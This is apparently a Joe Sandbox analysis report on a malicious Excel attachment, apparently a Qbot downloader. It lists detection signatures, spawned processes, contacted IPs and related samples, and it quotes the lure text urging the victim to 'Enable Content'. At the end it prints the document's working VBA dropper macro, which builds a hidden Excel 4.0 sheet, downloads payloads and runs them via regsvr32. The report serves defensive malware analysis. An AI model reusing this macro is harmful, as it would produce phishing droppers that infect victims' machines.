Loading ...

Play interactive tourEdit tour

Windows Analysis Report Compensation-54975366-09272021.xls

Overview

General Information

Sample Name:Compensation-54975366-09272021.xls
Analysis ID:493017
MD5:ad92ec6582db6a96102e47dc7ba25e29
SHA1:496757d5b32f14856239db015acd8335a25bdb2d
SHA256:8103f50856a1a1e89ba885dd264bc5779cf74c8e837b556653bc6c410e019c0f
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for domain / URL
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Potential document exploit detected (unknown TCP traffic)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2568 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1188 cmdline: regsvr32 -silent ..\Drezd.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1444 cmdline: regsvr32 -silent ..\Drezd1.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1268 cmdline: regsvr32 -silent ..\Drezd2.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Compensation-54975366-09272021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Drezd.red, CommandLine: regsvr32 -silent ..\Drezd.red, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2568, ProcessCommandLine: regsvr32 -silent ..\Drezd.red, ProcessId: 1188

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for domain / URLShow sources
    Source: http://185.183.96.67/Virustotal: Detection: 7%Perma Link
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.178:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.178:80
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 185.183.96.67:80
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.250.148.213:80
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 185.183.96.67
    Source: unknownTCP traffic detected without corresponding DNS query: 185.183.96.67
    Source: unknownTCP traffic detected without corresponding DNS query: 185.183.96.67
    Source: unknownTCP traffic detected without corresponding DNS query: 185.183.96.67
    Source: unknownTCP traffic detected without corresponding DNS query: 185.183.96.67
    Source: unknownTCP traffic detected without corresponding DNS query: 185.183.96.67
    Source: unknownTCP traffic detected without corresponding DNS query: 185.250.148.213
    Source: unknownTCP traffic detected without corresponding DNS query: 185.250.148.213
    Source: unknownTCP traffic detected without corresponding DNS query: 185.250.148.213
    Source: unknownTCP traffic detected without corresponding DNS query: 185.250.148.213
    Source: unknownTCP traffic detected without corresponding DNS query: 185.250.148.213
    Source: unknownTCP traffic detected without corresponding DNS query: 185.250.148.213
    Source: Compensation-54975366-09272021.xlsString found in binary or memory: http://185.183.96.67/
    Source: Compensation-54975366-09272021.xlsString found in binary or memory: http://185.250.148.213/
    Source: Compensation-54975366-09272021.xlsString found in binary or memory: http://190.14.37.178/
    Source: regsvr32.exe, 00000005.00000002.691672690.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.692525473.0000000001CE0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.693426927.0000000001CA0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing ) 21 23 24 25 2. Click to "Enable Content" to perform Microsoft Excel Decryption
    Source: Screenshot number: 4Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
    Source: Screenshot number: 4Screenshot OCR: Enable Macros ) 30 31 32 :: Why I can not open this document? 35 36 - You are using iOS or And
    Source: Document image extraction number: 0Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
    Source: Document image extraction number: 0Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 0Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Source: Document image extraction number: 1Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 1Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Source: Compensation-54975366-09272021.xlsOLE, VBA macro line: Sub auto_open()
    Source: Compensation-54975366-09272021.xlsOLE, VBA macro line: Sub auto_close()
    Source: Compensation-54975366-09272021.xlsOLE, VBA macro line: Private m_openAlreadyRan As Boolean
    Source: Compensation-54975366-09272021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: Compensation-54975366-09272021.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Compensation-54975366-09272021.xlsOLE indicator, Workbook stream: true
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.redJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.redJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.redJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREEA2.tmpJump to behavior
    Source: classification engineClassification label: mal72.expl.winXLS@7/2@0/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Compensation-54975366-09272021.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting2Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution21Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting2NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://190.14.37.178/0%VirustotalBrowse
    http://190.14.37.178/0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe
    http://185.183.96.67/8%VirustotalBrowse

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://190.14.37.178/Compensation-54975366-09272021.xlsfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://servername/isapibackend.dllregsvr32.exe, 00000005.00000002.691672690.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.692525473.0000000001CE0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.693426927.0000000001CA0000.00000002.00020000.sdmpfalse
    • Avira URL Cloud: safe
    low
    http://185.183.96.67/Compensation-54975366-09272021.xlstrueunknown
    http://185.250.148.213/Compensation-54975366-09272021.xlsfalse
      unknown

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      185.183.96.67
      unknownNetherlands
      60117HSAEfalse
      190.14.37.178
      unknownPanama
      52469OffshoreRacksSAPAfalse
      185.250.148.213
      unknownRussian Federation
      48430FIRSTDC-ASRUfalse

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:493017
      Start date:29.09.2021
      Start time:08:58:06
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 9m 6s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Compensation-54975366-09272021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:9
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal72.expl.winXLS@7/2@0/3
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to English - United States
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      HSAECompensationClaim-1630636598-09282021.xlsGet hashmaliciousBrowse
      • 185.141.27.213
      CompensationClaim-1033191014-09282021.xlsGet hashmaliciousBrowse
      • 185.141.27.213
      xls.xlsGet hashmaliciousBrowse
      • 185.183.96.67
      Compensation-1214892625-09272021.xlsGet hashmaliciousBrowse
      • 185.183.96.67
      Compensation-2100058996-09272021.xlsGet hashmaliciousBrowse
      • 185.183.96.67
      Compensation-1657705079-09272021.xlsGet hashmaliciousBrowse
      • 185.183.96.67
      Compensation-1214892625-09272021.xlsGet hashmaliciousBrowse
      • 185.183.96.67
      #Qbot downloader.xlsGet hashmaliciousBrowse
      • 185.183.96.67
      Compensation-2308017-09272021.xlsGet hashmaliciousBrowse
      • 185.183.96.67
      Compensation-1730406737-09272021.xlsGet hashmaliciousBrowse
      • 185.183.96.67
      KHI13mrm4c.exeGet hashmaliciousBrowse
      • 185.183.98.2
      Copy of Payment-228607772-09222021.xlsGet hashmaliciousBrowse
      • 185.82.202.248
      NJS4hNBeUR.exeGet hashmaliciousBrowse
      • 185.198.57.68
      rQoEGMGufv.exeGet hashmaliciousBrowse
      • 185.45.192.203
      5ya8R7LxXl.exeGet hashmaliciousBrowse
      • 185.45.192.203
      Uz2eSldsZe.exeGet hashmaliciousBrowse
      • 185.45.192.203
      SWIFT_COPY.htmGet hashmaliciousBrowse
      • 194.36.191.196
      3hTS09wZ7G.exeGet hashmaliciousBrowse
      • 185.183.96.3
      040ba58b824e36fc9117c1e3c8b651d9e4dc3fe12b535.exeGet hashmaliciousBrowse
      • 185.183.96.3
      OC2Z0JbqfA.exeGet hashmaliciousBrowse
      • 185.183.96.3
      OffshoreRacksSAPACompensationClaim-1630636598-09282021.xlsGet hashmaliciousBrowse
      • 190.14.37.187
      CompensationClaim-1033191014-09282021.xlsGet hashmaliciousBrowse
      • 190.14.37.187
      xls.xlsGet hashmaliciousBrowse
      • 190.14.37.178
      Compensation-1214892625-09272021.xlsGet hashmaliciousBrowse
      • 190.14.37.178
      Compensation-2100058996-09272021.xlsGet hashmaliciousBrowse
      • 190.14.37.178
      Compensation-1657705079-09272021.xlsGet hashmaliciousBrowse
      • 190.14.37.178
      Compensation-1214892625-09272021.xlsGet hashmaliciousBrowse
      • 190.14.37.178
      #Qbot downloader.xlsGet hashmaliciousBrowse
      • 190.14.37.178
      Compensation-2308017-09272021.xlsGet hashmaliciousBrowse
      • 190.14.37.178
      Compensation-1730406737-09272021.xlsGet hashmaliciousBrowse
      • 190.14.37.178
      Claim-838392655-09242021.xlsGet hashmaliciousBrowse
      • 190.14.37.173
      claim.xlsGet hashmaliciousBrowse
      • 190.14.37.173
      Claim-1368769328-09242021.xlsGet hashmaliciousBrowse
      • 190.14.37.173
      Claim-1763045001-09242021.xlsGet hashmaliciousBrowse
      • 190.14.37.173
      Claim-680517779-09242021.xlsGet hashmaliciousBrowse
      • 190.14.37.173
      Payment-687700136-09212021.xlsGet hashmaliciousBrowse
      • 190.14.37.232
      Permission-851469163-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-851469163-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-830724601-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-830724601-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):162688
      Entropy (8bit):4.254489263970457
      Encrypted:false
      SSDEEP:1536:C6PL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CKJNSc83tKBAvQVCgOtmXmLpLm4l
      MD5:AF62D292C1ACEE669E4E728C4FB368E5
      SHA1:9D0CBF8C75F83DC429266AA5EA4E824B99F558B0
      SHA-256:B5C5FEA147EEAB9723FCAA51873C05DB0B6237BA2AB037C4AA74C8D3F23B179B
      SHA-512:B2198ED94885216706CB4437BFA31B35684B868F6059341072330E67ABAD4021DE6E4F10A21197DDB3279A70245CD970CFF86DCF1A2B05C18B0305556586004A
      Malicious:false
      Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
      C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):15676
      Entropy (8bit):4.5329984319574645
      Encrypted:false
      SSDEEP:192:+xlAJ1DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:+3AxesT20lheZ3waE5D7qxIxkxe
      MD5:E3DFE8425D5B0937A7FD293656F50517
      SHA1:1AA21831F89D76299208FD69669444B2AA94A23F
      SHA-256:30341DF213083AB78C4C4157919ADBDB0EEEE8AF6DF41EDDD725AD521A7DFAE5
      SHA-512:F05ED15A5820FD45807F2B59D57FE0BD245BB35DD7765D4A6FD408C2FAF68505244369BA1E57950815918A7BB96A7911925FD17730D93A9401A3866E56A1661B
      Malicious:false
      Preview: MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... ...............q..7.,.L....V............E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......|...K..a...

      Static File Info

      General

      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Sep 27 10:38:52 2021, Security: 0
      Entropy (8bit):7.1318928216423245
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:Compensation-54975366-09272021.xls
      File size:129024
      MD5:ad92ec6582db6a96102e47dc7ba25e29
      SHA1:496757d5b32f14856239db015acd8335a25bdb2d
      SHA256:8103f50856a1a1e89ba885dd264bc5779cf74c8e837b556653bc6c410e019c0f
      SHA512:9158bdcc33fe604a4bdfb9bec0a58ec1be95914ea3e4c551188c1703760d6b5fb7650e62a2ff91c12c64816ced9d21d9b213215e5eeca25d894050c91bc7c645
      SSDEEP:3072:Cik3hOdsylKlgxopeiBNhZFGzE+cL2kdAnc6YehWfG+tUHKGDbpmsiinBti2JtqV:vk3hOdsylKlgxopeiBNhZF+E+W2kdAn+
      File Content Preview:........................>.......................................................b..............................................................................................................................................................................

      File Icon

      Icon Hash:e4eea286a4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "Compensation-54975366-09272021.xls"

      Indicators

      Has Summary Info:True
      Application Name:Microsoft Excel
      Encrypted Document:False
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Code Page:1251
      Author:Test
      Last Saved By:Test
      Create Time:2015-06-05 18:17:20
      Last Saved Time:2021-09-27 09:38:52
      Creating Application:Microsoft Excel
      Security:0

      Document Summary

      Document Code Page:1251
      Thumbnail Scaling Desired:False
      Company:
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:1048576

      Streams with VBA

      VBA File Name: UserForm2, Stream Size: -1
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2
      VBA File Name:UserForm2
      Stream Size:-1
      Data ASCII:
      Data Raw:
      VBA Code
      Attribute VB_Name = "UserForm2"
      Attribute VB_Base = "0{C7392748-7F28-4EE6-BCFC-6C9C72F3AD88}{96B851A6-6A1B-4177-A71C-36C172A843DA}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = False
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = False
      VBA File Name: Module5, Stream Size: 4241
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Module5
      VBA File Name:Module5
      Stream Size:4241
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 9c 0d 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      Attribute VB_Name = "Module5"
      
      Sub auto_open()
      On Error Resume Next
      Trewasd = "REGISTER"
      Drezden = "="
      Naret = "EXEC"
      Application.ScreenUpdating = False
      Gert
      Sheets("Sheet777").Visible = False
      Sheets("Sheet777").Range("A1:M100").Font.Color = vbWhite
      
      Sheets("Sheet777").Range("H24") = UserForm2.Label1.Caption
      Sheets("Sheet777").Range("H25") = UserForm2.Label3.Caption
      Sheets("Sheet777").Range("H26") = UserForm2.Label4.Caption
      
      Sheets("Sheet777").Range("K17") = "=NOW()"
      Sheets("Sheet777").Range("K18") = ".dat"
      Sheets("Sheet777").Range("K18") = ".dat"
      
      
      Sheets("Sheet777").Range("H35") = "=HALT()"
      Sheets("Sheet777").Range("I9") = UserForm2.Label2.Caption
      Sheets("Sheet777").Range("I10") = UserForm2.Caption
      Sheets("Sheet777").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
      Sheets("Sheet777").Range("I12") = "Byukilos"
      Sheets("Sheet777").Range("G10") = "..\Drezd.red"
      Sheets("Sheet777").Range("G11") = "..\Drezd1.red"
      Sheets("Sheet777").Range("G12") = "..\Drezd2.red"
      Sheets("Sheet777").Range("I17") = "regsvr32 -silent ..\Drezd.red"
      Sheets("Sheet777").Range("I18") = "regsvr32 -silent ..\Drezd1.red"
      Sheets("Sheet777").Range("I19") = "regsvr32 -silent ..\Drezd2.red"
      Sheets("Sheet777").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
      Sheets("Sheet777").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
      Sheets("Sheet777").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
      Sheets("Sheet777").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
      Sheets("Sheet777").Range("H17") = Drezden & Naret & "(I17)"
      Sheets("Sheet777").Range("H18") = Drezden & Naret & "(I18)"
      Sheets("Sheet777").Range("H19") = Drezden & Naret & "(I19)"
      
      
      Application.Run Sheets("Sheet777").Range("H1")
      
      End Sub
      
      Sub auto_close()
      On Error Resume Next
      Application.ScreenUpdating = True
         Application.DisplayAlerts = False
         Sheets("Sheet777").Delete
         Application.DisplayAlerts = True
      End Sub
      
      Function Gert()
      Set Fera = Excel4IntlMacroSheets
      Fera.Add.Name = "Sheet777"
      End Function
      VBA File Name: Sheet1, Stream Size: 991
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1
      Stream Size:991
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      Attribute VB_Name = "Sheet1"
      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
